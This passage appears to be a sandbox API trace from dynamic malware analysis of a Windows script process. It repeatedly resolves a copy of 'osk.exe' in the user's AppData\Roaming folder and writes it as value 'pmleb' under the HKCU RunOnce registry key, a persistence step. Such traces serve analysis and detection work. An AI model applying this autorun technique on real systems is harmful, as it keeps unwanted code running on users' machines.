[0082.219] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.219] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x67 [0082.219] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.220] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0082.220] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.220] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.221] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.221] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.221] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.221] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.221] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.221] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.221] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.221] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.221] RegCloseKey (hKey=0x280) returned 0x0 [0082.221] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.222] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.222] SetTimer (hWnd=0x20280, nIDEvent=0x20e2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e2 [0082.222] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.233] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.233] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.233] KillTimer (hWnd=0x20280, uIDEvent=0x20e2) returned 1 [0082.234] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.234] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.234] IUnknown:Release (This=0x787518) returned 0x1 [0082.234] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.234] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.234] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.234] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.235] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.235] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.235] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.235] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.235] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0082.235] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.235] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x68 [0082.235] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.236] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0082.236] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.236] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.236] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.236] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.236] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.236] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.236] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.237] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.237] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.237] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.237] RegCloseKey (hKey=0x280) returned 0x0 [0082.237] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.237] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.237] SetTimer (hWnd=0x20280, nIDEvent=0x20e3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e3 [0082.238] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.249] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.249] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.249] KillTimer (hWnd=0x20280, uIDEvent=0x20e3) returned 1 [0082.250] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.250] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.250] IUnknown:Release (This=0x787518) returned 0x1 [0082.250] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.250] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.250] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.250] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.251] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.251] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.251] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0082.251] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0082.251] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x69 [0082.251] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.252] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0082.252] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.252] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.252] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.252] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.252] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.252] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.252] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.252] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.253] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.253] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.253] RegCloseKey (hKey=0x280) returned 0x0 [0082.253] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.253] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.253] SetTimer (hWnd=0x20280, nIDEvent=0x20e4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e4 [0082.253] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.264] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0082.264] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.264] KillTimer (hWnd=0x20280, uIDEvent=0x20e4) returned 1 [0082.265] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.265] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.265] IUnknown:Release (This=0x787518) returned 0x1 [0082.265] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.265] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.265] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.265] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0082.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, 